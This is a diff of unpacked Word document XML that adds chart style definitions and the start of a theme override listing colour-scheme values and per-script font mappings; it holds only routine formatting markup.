+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMajor>
+  <cs:gridlineMinor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="5000"/>
+            <a:lumOff val="95000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMinor>
+  <cs:hiLoLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:hiLoLine>
+  <cs:leaderLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:leaderLine>
+  <cs:legend>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:legend>
+  <cs:plotArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:plotArea>
+  <cs:plotArea3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:plotArea3D>
+  <cs:seriesAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:seriesAxis>
+  <cs:seriesLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:seriesLine>
+  <cs:title>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="major">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="50000"/>
+        <a:lumOff val="50000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="1600" b="1" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:title>
+  <cs:trendline>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="19050" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+  </cs:trendline>
+  <cs:trendlineLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:trendlineLabel>
+  <cs:upBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:upBar>
+  <cs:valueAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:valueAxis>
+  <cs:wall>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:wall>
+</cs:chartStyle>
+</file>
+
+<file path=word/charts/style2.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:chartStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" id="303">
+  <cs:axisTitle>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" b="1" kern="1200"/>
+  </cs:axisTitle>
+  <cs:categoryAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:categoryAxis>
+  <cs:chartArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:chartArea>
+  <cs:dataLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="75000"/>
+        <a:lumOff val="25000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:dataLabel>
+  <cs:dataLabelCallout>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln>
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="25000"/>
+            <a:lumOff val="75000"/>
+          </a:schemeClr>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+    <cs:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="clip" horzOverflow="clip" vert="horz" wrap="square" lIns="36576" tIns="18288" rIns="36576" bIns="18288" anchor="ctr" anchorCtr="1">
+      <a:spAutoFit/>
+    </cs:bodyPr>
+  </cs:dataLabelCallout>
+  <cs:dataPoint>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint>
+  <cs:dataPoint3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint3D>
+  <cs:dataPointLine>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="22225" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointLine>
+  <cs:dataPointMarker>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="15875">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointMarker>
+  <cs:dataPointMarkerLayout symbol="circle" size="6"/>
+  <cs:dataPointWireframe>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointWireframe>
+  <cs:dataTable>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="800" kern="1200"/>
+  </cs:dataTable>
+  <cs:downBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="75000"/>
+          <a:lumOff val="25000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:downBar>
+  <cs:dropLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dropLine>
+  <cs:errorBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:errorBar>
+  <cs:floor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:floor>
+  <cs:gridlineMajor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMajor>
+  <cs:gridlineMinor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="5000"/>
+            <a:lumOff val="95000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMinor>
+  <cs:hiLoLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:hiLoLine>
+  <cs:leaderLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:leaderLine>
+  <cs:legend>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:legend>
+  <cs:plotArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:plotArea>
+  <cs:plotArea3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:plotArea3D>
+  <cs:seriesAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:seriesAxis>
+  <cs:seriesLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:seriesLine>
+  <cs:title>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="major">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="50000"/>
+        <a:lumOff val="50000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="1600" b="1" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:title>
+  <cs:trendline>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="19050" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+  </cs:trendline>
+  <cs:trendlineLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:trendlineLabel>
+  <cs:upBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:upBar>
+  <cs:valueAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:valueAxis>
+  <cs:wall>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:wall>
+</cs:chartStyle>
+</file>
+
 <file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
 <a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office-téma">
   <a:themeElements>
@@ -25276,6 +27505,578 @@
 </a:theme>
 </file>
 
+<file path=word/theme/themeOverride1.xml><?xml version="1.0" encoding="utf-8"?>
+<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+  <a:clrScheme name="Office">
+    <a:dk1>
+      <a:sysClr val="windowText" lastClr="000000"/>
+    </a:dk1>
+    <a:lt1>
+      <a:sysClr val="window" lastClr="FFFFFF"/>
+    </a:lt1>
+    <a:dk2>
+      <a:srgbClr val="44546A"/>
+    </a:dk2>
+    <a:lt2>
+      <a:srgbClr val="E7E6E6"/>
+    </a:lt2>
+    <a:accent1>
+      <a:srgbClr val="4472C4"/>
+    </a:accent1>
+    <a:accent2>
+      <a:srgbClr val="ED7D31"/>
+    </a:accent2>
+    <a:accent3>
+      <a:srgbClr val="A5A5A5"/>
+    </a:accent3>
+    <a:accent4>
+      <a:srgbClr val="FFC000"/>
+    </a:accent4>
+    <a:accent5>
+      <a:srgbClr val="5B9BD5"/>
+    </a:accent5>
+    <a:accent6>
+      <a:srgbClr val="70AD47"/>
+    </a:accent6>
+    <a:hlink>
+      <a:srgbClr val="0563C1"/>
+    </a:hlink>
+    <a:folHlink>
+      <a:srgbClr val="954F72"/>
+    </a:folHlink>
+  </a:clrScheme>
+  <a:fontScheme name="Office">
+    <a:majorFont>
+      <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック Light"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线 Light"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Times New Roman"/>
+      <a:font script="Hebr" typeface="Times New Roman"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="MoolBoran"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Times New Roman"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:majorFont>
+    <a:minorFont>
+      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
